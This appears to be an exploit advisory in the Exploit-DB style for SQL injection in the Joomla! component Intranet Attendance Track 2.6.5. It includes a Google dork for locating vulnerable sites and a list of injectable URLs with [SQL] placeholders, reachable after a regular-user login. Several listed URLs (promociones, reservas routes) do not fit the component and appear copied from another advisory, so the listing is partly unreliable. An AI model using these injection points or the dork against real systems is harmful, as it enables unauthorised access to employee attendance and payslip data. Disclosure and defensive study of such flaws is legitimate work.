27 lines
No EOL
1.6 KiB
Text
27 lines
No EOL
1.6 KiB
Text
# # # # #
|
|
# Exploit Title: Joomla! Component Intranet Attendance Track v2.6.5 - SQL Injection
|
|
# Google Dork: inurl:index.php?option=com_intranet
|
|
# Date: 25.02.2017
|
|
# Vendor Homepage: http://thagatpam.in/
|
|
# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/intranet-attendance-track/
|
|
# Demo: http://demo4.thagatpam.in/
|
|
# Version: 2.6.5
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# Login as regular user
|
|
# http://localhost/[PATH]/index.php?option=com_intranet&view=calendar&month=3&year=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_intranet&view=calendar&month=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_intranet&view=weeklyattendance&layout=weeklypdf&userid=940&weekstartdate=2017-02-20&weekuptodate=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_intranet&view=weeklyattendance&layout=weeklypdf&userid=940&weekstartdate=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_intranet&view=payslip&layout=mypayslip&user=940&month=8&year=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_intranet&view=payslip&layout=mypayslip&user=940&month=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_intranet&controller=promociones&task=landing&idPromocion=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_intranet&controller=reservas&task=paso1&tipoIdaVuelta=1&rutaSalida=20&rutaDestino=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_intranet&controller=reservas&task=paso1&tipoIdaVuelta=1&rutaSalida=[SQL]
|
|
# Etc..
|
|
# # # # # |